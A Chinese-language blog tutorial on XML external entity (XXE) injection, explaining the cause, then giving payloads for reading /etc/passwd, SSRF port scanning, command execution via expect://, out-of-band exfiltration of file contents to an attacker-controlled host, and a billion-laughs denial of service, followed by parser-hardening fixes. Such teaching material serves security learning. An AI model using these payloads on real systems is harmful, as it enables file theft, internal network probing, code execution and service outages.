【Web漏洞探索】外部实体注入漏洞

最新推荐文章于 2024-04-14 02:08:15 发布
最新推荐文章于 2024-04-14 02:08:15 发布
阅读量1k 收藏 3
点赞数 1
分类专栏: Web漏洞 安全 文章标签: 前端 网络 安全
kjcxmx
本文链接:https://blog.csdn.net/kjcxmx/article/details/125879489
版权

文章目录

请添加图片描述

一、什么是外部实体注入漏洞

外部实体注入漏洞XXE(XML External Entity Injection)也就是XML外部实体注入,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞发生在应用程序解析XML输入时,XML文件的解析依赖libxml库,而libxml 2.9以前的版本默认支持并开启了对外部实体的引用,服务端解析用户提交的XML文件时,未对XML文件引用的外部实体(含外部一般实体和外部参数实体)做合适的处理,并且实体的URL支持file://ftp://等协议,导致可加载恶意外部文件和代码,造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害。

二、外部实体注入漏洞成因

XML文档结构包括XML声明、DTD(Document Type Definition,即文档类型定义、文档元素)。DTD用来为XML文档定义语义约束。DTD可以嵌在XML文档内声明(内部声明),也可以独立的放在另外一个单独的文件中(外部引用)。

内部实体声明

DTD内部声明:<!DOCTYPE 根元素 [实体声明]>
DTD内部实体声明:<!ENTITY 实体名称 “实体的值">

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [
<!ENTITY xxe "xee vuln">]>
<foo>&xxe;</foo>
外部实体声明

DTD外部引用:<!DOCTYPE 根元素名称 SYSTEM “外部DTD的URL">
DTD外部实体声明:<!ENTITY 实体名称 SYSTEM “URI/URL">

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://www.xxetest.com/entities.dtd">]>
<reset>
    <foo>&xxe;</foo>
</reset>

<?xml version="1.0"?>
<!DOCTYPE foo [   
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" > ]>
<foo>&xxe;</foo>
参数实体声明

<!ENTITY % 实体名称 "实体的值">
<!ENTITY % 实体名称 SYSTEM "URI/URL">

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [

<!ENTITY % body SYSTEM "http://www.xxetest.com/entities.dtd" >
<!ENTITY xxe "%body;">]>
<reset>
    <secret>login</secret>
</reset>

三、漏洞攻击利用手法

有回显
DTD外部实体声明

直接通过DTD外部实体声明

<?xml version="1.0"?>
<!DOCTYPE foo[
    <!ENTITY test SYSTEM "file:///etc/passwd">
]>
<foo>&test;</foo>
DTD实体声明

通过DTD外部实体声明引入外部DTD文档,再引入外部实体声明

<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ENTITY test SYSTEM "http://test.com/evil.dtd">]>
<foo>&test;</foo>

//而http://test.com/evil.dtd内容为
<!ENTITY test SYSTEM "file:///etc/passwd">
DTD参数声明

通过DTD外部实体声明引入外部DTD文档,再引入外部实体声明

<?xml version="1.0"?>
<!DOCTYPE foo [    
<!ENTITY %test SYSTEM "http://test.com/evil.dtd">]>
<foo>%test;</foo>

// http://test.com/evil.dtd文件内容
<!ENTITY test SYSTEM "file:///etc/passwd">
内网端口扫描

我们也可以使用http URI并强制服务器向我们指定的端点和端口发送GET请求,将XXE转换为SSRF(服务器端请求伪造)。

<?xml version="1.0"?>
<!DOCTYPE GVI [
    <!ENTITY foo SYSTEM "http://127.0.0.1:80" >
]>
远程代码执行

有些情况下能够通过XXE执行代码,这主要是由于配置不当/开发内部应用导致的。PHP expect模块被加载到了易受攻击的系统或处理XML的内部应用程序上,那么我们就可以执行命令

<?xml version="1.0"?>
<!DOCTYPE GVI [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<root id="test">
<foo>&xxe;</foo>
</root>
读取任意文件
<!ENTITY name SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">]>
无回显
Out-of Band检测

对于无回显的XXE,我们需要构建一条带外数据(Out-of Band,OOB)通道来读取数据。思路是:

  1. 攻击者先发送payload1给Web服务器
  2. payload1触发Web服务器,Web服务器向VPS获取恶意DTD,并执行payload2
  3. payload2使Web服务器把结果作为参数来访问VPS上的HTTP服务
  4. 攻击者通过VPS的HTTP访问记录得到结果
利用DNSLog检测
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY[
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % remote SYSTEM "http://192.168.110.1:8888/evil.xml">
%remote;
%all;
%send;
]>
<root>&name;</root>

// evil.xml

<!ENTITY % all "<!ENTITY % send SYSTEM 'http://192.168.110.1:8888/1.php?file=%file;'>">

同样的也可以进行FTP协议的外带回显

拒绝服务

利用定义实体参数变量,重复引用进行指数级增长,导致解析异常。

<?xml version="1.0"?>
<!DOCTYPE foo [
 <!ENTITY lol "lol">
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<foo>&lol9;</foo>

四、修复以及预防

禁用外部实体的方法

使用开发语言提供的禁用外部实体的方法。

PHP:
libxml_disable_entity_loader(true);
     
JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
     
Python:
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
过滤用户的输入

过滤用户提交的XML数据,参考关键词:<!DOCTYPE<!ENTITY或者SYSTEMPUBLIC

禁用自定义的DTD

不允许XML中含有自己定义的DTD。

五、附录

参考链接:
https://mp.weixin.qq.com/s/scFsOJsKL2Jxx3hsQVfEdw
https://mp.weixin.qq.com/s/3CAnOr38wCrWB1-UJYZ5aQ
https://mp.weixin.qq.com/s/-c0853Vbydmngzch7_aHkg

byzf
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
第十八天xxe 外部实体
代码审计
03-25 404
简单来说,XXE(XML External Entity Injection)就是XML外部实体注入。 当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。 例如,如果你当前使用的程序为PHP,则可以将libxml_disable_entity_loader设置为TRUE来禁用外部实体,从而起到防御的目的。 一、xml基础 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言
XML 外部实体 (XXE) 漏洞及其修复方法
allway2的博客
07-27 5893
PHP拥有可能是最流行的后端Web应用程序语言的称号,因此,它是攻击者的主要目标,包括XXE攻击。由于攻击者经常发现新的漏洞,因此必须保持您的PHP版本是最新的以保护您的应用程序。它们不能用于获取二进制文件,或包含类似于XML但实际上不是有效XML的代码的文件。XXE(XML外部实体注入)是一种常见的基于Web安全漏洞,它使攻击者能够干扰Web应用程序中XML数据的处理。虽然是一个常见的漏洞,但通过良好的编码实践和一些特定于语言的建议,可以轻松实现防止XXE攻击。...
XML 注入漏洞原理以及修复方法
it知识分享 free for nothing..
01-23 1146
XML 注入漏洞原理以及修复方法
Xxe外部实体注入XML External Entity Injection),2024年最新【原理+实战+视频+源码
最新发布
2301_78399639的博客
04-14 722
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。这是防范最为严格的手段,从前面的学习我们已经知道XXE的全部利用手段基础都来源于外部实体注入, 也就是如果禁用了外部实体,那么XXE的所有攻击手段都将失效,无法再正常利用。**既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!
XXE外部实体引入漏洞原理及复现
G3et的博客
02-26 724
XXE (XML 外部实体) 是一种安全漏洞,影响解析 XML 输入的应用程序。该漏洞允许攻击者在 XML 文档中注入外部实体, DTD 可以在 XML 文档中引用外部实体。如果 XML 解析器未正确验证外部实体的内容,攻击者可以利用 XXE 漏洞读取系统的机密数据,或者在恶意 DTD 文件中执行任意代码。当应用程序未能正确处理传入的 XML 数据或未限制可以处理的实体类型时,XXE 可能发生。因此,攻击者可以构造一个包含外部实体的恶意 XML 文档,该外部实体由脆弱的应用程序处理。
第二讲 外部实体注入
manok的专栏
12-19 1795
源代码审计,最近比较火爆,我们是创新的源代码审计课程。
XXE(XML外部实体注入)漏洞分析——pikachu靶场复现
qq_45612828的博客
08-02 6527
XXE(XML外部实体注入)漏洞分析——pikachu靶场复现
web安全漏洞挖掘梳理
06-22
其中,XXE 漏洞是一种常见的安全漏洞,攻击者可以通过构建外部实体注入来攻击 Web 应用程序。 1.什么是 XML XML(Extensible Markup Language)是一种标记语言,用于描述和定义数据的结构和内容。XML 文档通常由...
WebGoat8-xxe注入漏洞分析
09-15
XXE 注入漏洞是基于 XML 外部实体的攻击,攻击者可以通过构造特殊的 XML 实体来读取服务器上的敏感信息。XML 外部实体XML 1.0 中的一种特性,允许开发者在 XML 文档中引入外部实体,以便在 XML 文档中使用外部...
DVWA靶场,集成了owasp top 10漏洞
03-28
7. A7:XML外部实体XML External Entities, XXE) - 当XML解析器处理包含恶意外部实体XML文档时,可能导致信息泄露或拒绝服务。在DVWA中,你可以学习如何构造XXE攻击。 8. A8:不安全的直接对象引用(Insecure ...
fortify安全基础知识 不同语言软件安全漏洞
05-27
- **XML解析漏洞**:XML外部实体攻击(XXE)可能通过恶意构造的XML文档泄露系统信息或执行恶意代码。 - **DLL劫持**:恶意第三方可以替换系统或应用程序的DLL,导致意外行为。 Fortify工具通过静态代码分析,能...
AWVS/Acunetix Premium v24.1.24高级版漏洞扫描器
01-21
Acunetix Premium 提供了全面的扫描功能,能够探测出包括SQL注入、跨站脚本(XSS)、XML外部实体注入、敏感数据泄露等多种常见和复杂的Web应用漏洞。此外,它还支持对现代Web技术,如单页应用(SPA)、RESTful API...
XXE(外部实体注入)详解
2401_82576671的博客
01-23 1795
​ 应用程序在解析XML时没有过滤外部实体的加载,导致加载了恶意的外部文件,造成执行命令、读取文件、扫描内网、攻击内网等危害。​ 运维人员使用了低版本的php,libxml低于2.9.1或者设置了libxml_disable_entity_loader(False)就可以加载外部实体。将文档类型直接放入XML文档中,称为内部定义。内部定义格式:<!DOMCTYPE 根元素 [元素声明]>DOCTYPE note[ #定义跟根节点。
XML外部实体注入漏洞——XXE简单分析
未完成的歌~的博客
02-01 1194
前言: 前几天做了南邮 NJUPT CTF的几道题,感觉自己要学的的东西还有太多!今天借着比赛中的一道Web题 来系统的学习下XML外部实体注入(XML External Entity Injection) 题目:Fake XML cookbook 题目:Fake XML cookbook 平台暂时还未关闭,想要复现的抓紧了! 网址:https://nctf.x1c.club/challenges#Web ...
XXE原理,利用与修复详解
GalaxySpaceX的博客
07-20 1198
XXE原理+利用+修复
PHP XXE漏洞
weixin_30849591的博客
01-24 1082
PHP xml 外部实体注入漏洞(XXE) 1.环境 PHP 7.0.30Libxml 2.8.0Libxml2.9.0 以后 ,默认不解析外部实体,对于PHP版本不影响XXE的利用 2.原理介绍 XML 被设计为传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。 HTML 旨在显示信息,而 XML 旨在传输信息。XML特点,XML 被设计用来结构化、...
(十二)XML外部实体(XXE)注入
weixin_43047908的博客
04-16 1752
目录一、什么是XML外部实体注入?二、XXE漏洞如何产生?什么是XML?什么是XML实体?什么是文件类型定义(DTD)?什么是XML自定义实体?什么是XML外部实体?三、XXE攻击有哪些类型?利用XXE检索文件利用XXE执行SSRF攻击四、寻找用于XXE注入的隐藏攻击面XInclude攻击通过文件上传进行XXE攻击通过修改的内容类型进行XXE攻击五、如何预防XXE漏洞 一、什么是XML外部实体注入XML外部实体注入(也称为XXE)是一个Web安全漏洞,它使攻击者能够干扰应用程序对XML数据的处理。它通
Xxe外部实体注入XML External Entity Injection)_externalmetadata
m0_61549674的博客
04-06 784
网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算**这是防范最为严格的手段,从前面的学习我们已经知道XXE的全部利用手段基础都来源于外部实体注入, 也就是如果禁用了外部实体,那么XXE的所有攻击手段都将失效,无法再正常利用。探测内网信息、攻击内网网站、读取本地文件、读取远程文件、读取php源码。
.xml外部实体引用
热门推荐
一技旁身
06-01 1万+
一、语法XML声明: XML声明放在XML文档的第一行 XML声明由以下几个部分组成: version:文档符合xml1.0规范,我们学习1.0 encoding:文档字符编码,比如“GB2312”或者“UTF-8” standalone:文档定义是否独立使用“no”为默认值表示不独立(允许使用外部声明),yes表示独立使用(不允许使用外部声明) &lt;?sml version="1.0" ?...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

byzf

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值